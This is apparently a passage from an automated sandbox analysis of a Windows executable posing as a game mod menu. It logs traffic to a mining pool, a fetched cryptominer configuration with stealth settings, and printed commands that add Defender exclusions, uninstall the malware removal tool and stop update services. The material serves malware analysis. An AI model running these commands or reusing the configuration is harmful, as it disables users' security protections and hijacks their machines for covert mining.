                                                May 22, 2024 06:46:13.563364029 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:13.767620087 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:15.206082106 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:15.242331028 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:15.421334028 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:15.564518929 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:15.943572044 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:16.158245087 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:17.221417904 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:17.226587057 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:17.410985947 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:17.564492941 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:19.291804075 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:19.300403118 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:19.484662056 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:19.564491987 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:21.314704895 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:21.319780111 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:21.504154921 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:21.564635038 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:23.330975056 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:23.336165905 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:23.523709059 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:23.564491034 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:25.348783970 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:25.353871107 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:25.537964106 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:25.580113888 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:26.978343964 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:27.033222914 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:28.414635897 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:28.419594049 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:28.607270956 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:28.658310890 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:30.523916006 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:30.529098988 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:30.714227915 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:30.798930883 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:32.548974991 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:32.554053068 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:32.739851952 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:32.798840046 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:34.564573050 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:34.569679976 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:34.753554106 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:34.798846006 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:36.582837105 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:36.587814093 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:36.771866083 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:36.814448118 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:38.611733913 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:38.617063999 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:38.800810099 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:38.845789909 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:40.627034903 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:40.632266045 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:40.816015005 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:40.861313105 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:42.917001963 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:42.922272921 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:43.108947992 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:43.220705032 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:44.965651989 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:44.970714092 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:45.154934883 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:45.220719099 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:48.678822041 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:48.683954954 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:48.868268967 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:48.943016052 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:50.712969065 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:50.718393087 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:50.902920961 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:51.017584085 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:52.736712933 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:52.741915941 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:52.928471088 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:53.033210993 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:54.797271013 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:54.802378893 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:54.986341953 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:55.033175945 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:56.815057993 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:56.822132111 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:57.004651070 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:57.219022989 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:57.219124079 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:58.892751932 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:46:58.897779942 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:59.160887003 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:46:59.205403090 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:00.919061899 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:00.924655914 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:01.109088898 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:01.330041885 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:02.939582109 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:02.944936991 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:03.131458998 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:03.220676899 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:06.361253977 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:06.366241932 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:06.550786018 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:06.720658064 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:08.417637110 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:08.423506021 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:08.607821941 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:08.720696926 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:10.486560106 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:10.491795063 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:10.675579071 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:10.720675945 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:12.505779028 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:12.511188030 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:12.696641922 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:12.830001116 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:14.533328056 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:14.538450956 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:14.725234985 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:14.766171932 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:16.548849106 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:16.554047108 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:16.739903927 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:16.830054998 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:18.564651012 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:18.572504044 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:18.753731966 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:18.830050945 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:20.565781116 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:20.571063995 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:20.755353928 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:20.829988003 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:24.205583096 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:24.212088108 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:24.398200035 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:24.533098936 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:26.220976114 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:26.226077080 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:26.410060883 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:26.517469883 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:27.701863050 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:27.829953909 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:29.267600060 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:29.272856951 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:29.456584930 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:29.533093929 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:31.267765045 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:31.412695885 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:31.596451044 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:31.720607042 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:33.283210993 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:33.288212061 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:33.474031925 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:33.517467022 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:35.314382076 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:35.321059942 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:35.503886938 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:35.626811028 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:37.314650059 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:37.319622993 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:37.503793001 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:37.626844883 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:39.330811024 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:39.336503029 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:39.520397902 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:39.651750088 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:41.897075891 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:41.903692007 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:42.087630033 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:42.329951048 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:43.908268929 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:43.915654898 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:44.099839926 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:44.220644951 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:45.939419985 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:45.944581985 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:46.128689051 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:46.329941034 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:47.974122047 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:47.979232073 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:48.165067911 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:48.220681906 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:50.004836082 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:50.010078907 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:50.200411081 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:50.329947948 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:52.020740986 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:52.026088953 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:52.210381985 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:52.330023050 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:54.033219099 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:54.038563013 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:54.222125053 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:54.329932928 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:56.064490080 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:56.069535017 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:56.254358053 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:56.329952002 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:58.014226913 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:58.126784086 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:59.018167973 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:47:59.023411036 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:59.261044979 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:47:59.329883099 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:48:01.034632921 CEST497067752192.168.2.577.105.166.179
                                                May 22, 2024 06:48:01.050029039 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:48:01.233577013 CEST77524970677.105.166.179192.168.2.5
                                                May 22, 2024 06:48:01.329885006 CEST497067752192.168.2.577.105.166.179

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                May 22, 2024 06:46:09.706837893 CEST5273253192.168.2.51.1.1.1
                                                May 22, 2024 06:46:09.741910934 CEST53527321.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                May 22, 2024 06:46:09.706837893 CEST192.168.2.51.1.1.10xec6bStandard query (0)gta5modmenufree.comA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                May 22, 2024 06:46:09.741910934 CEST1.1.1.1192.168.2.50xec6bNo error (0)gta5modmenufree.com188.114.96.3A (IP address)IN (0x0001)false
                                                May 22, 2024 06:46:09.741910934 CEST1.1.1.1192.168.2.50xec6bNo error (0)gta5modmenufree.com188.114.97.3A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • gta5modmenufree.com

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549705188.114.96.34432804C:\Windows\System32\dwm.exe
                                                TimestampBytes transferredDirectionData
                                                2024-05-22 04:46:10 UTC129OUTGET /CSHQRtZu/standingcpu HTTP/1.1
                                                Accept: */*
                                                Connection: close
                                                Host: gta5modmenufree.com
                                                User-Agent: cpp-httplib/0.12.6
                                                2024-05-22 04:46:10 UTC557INHTTP/1.1 200 OK
                                                Date: Wed, 22 May 2024 04:46:10 GMT
                                                Content-Type: text/plain
                                                Content-Length: 364
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecb9MnK2IYkrgx5gwynxGksU8JuYNTsCKa28ajh4f4qHVHqtdgKyErkXaIh7w%2BsrAWDOkfFRyM%2FfhbsUQimpHnqQVI%2FdtHYAhXwMWLhGAa0Qj93fND31nqggOOUKk%2FpKNlSVjV0T"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 887a2932aefe6a4e-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                2024-05-22 04:46:10 UTC364INData Raw: 7b 0d 0a 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 22 70 6f 6f 6c 22 3a 20 22 37 37 2e 31 30 35 2e 31 36 36 2e 31 37 39 22 2c 0d 0a 22 70 6f 72 74 22 3a 20 37 37 35 32 2c 0d 0a 22 77 61 6c 6c 65 74 22 3a 20 22 73 74 61 6e 64 69 6e 67 63 70 75 22 2c 0d 0a 22 70 61 73 73 77 6f 72 64 22 3a 20 22 73 74 61 6e 64 69 6e 67 63 70 75 22 2c 0d 0a 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 22 6b 65 65 70 61 6c 69 76 65 22 3a 20 74 72 75 65 2c 0d 0a 22 6d 61 78 2d 63 70 75 22 3a 20 33 35 2c 0d 0a 22 69 64 6c 65 2d 77 61 69 74 22 3a 20 34 2c 0d 0a 22 69 64 6c 65 2d 63 70 75 22 3a 20 38 30 2c 0d 0a 22 73 74 65 61 6c 74 68 2d 74 61 72 67 65 74 73 22 3a 20 22 54 61 73 6b 6d 67 72 2e 65 78 65 2c 50
                                                Data Ascii: {"algo": "rx/0","pool": "77.105.166.179","port": 7752,"wallet": "standingcpu","password": "standingcpu","nicehash": true,"ssltls": true,"keepalive": true,"max-cpu": 35,"idle-wait": 4,"idle-cpu": 80,"stealth-targets": "Taskmgr.exe,P


                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:00:45:55
                                                Start date:22/05/2024
                                                Path:C:\Users\user\Desktop\mav17final.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\mav17final.exe"
                                                Imagebase:0x7ff79ea40000
                                                File size:13'827'522 bytes
                                                MD5 hash:9E77A1C36B7EE264C38B958963769C08
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:00:45:55
                                                Start date:22/05/2024
                                                Path:C:\Users\user\Desktop\mav17final.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\mav17final.exe"
                                                Imagebase:0x7ff79ea40000
                                                File size:13'827'522 bytes
                                                MD5 hash:9E77A1C36B7EE264C38B958963769C08
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c "powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:00:45:57
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\dialer.exe"
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\dialer.exe
                                                Imagebase:0x7ff7c9b10000
                                                File size:5'290'264 bytes
                                                MD5 hash:0BCBEA7313655A42ECC0A1FDBCF37993
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 79%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:00:46:01
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff682d20000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:00:46:03
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
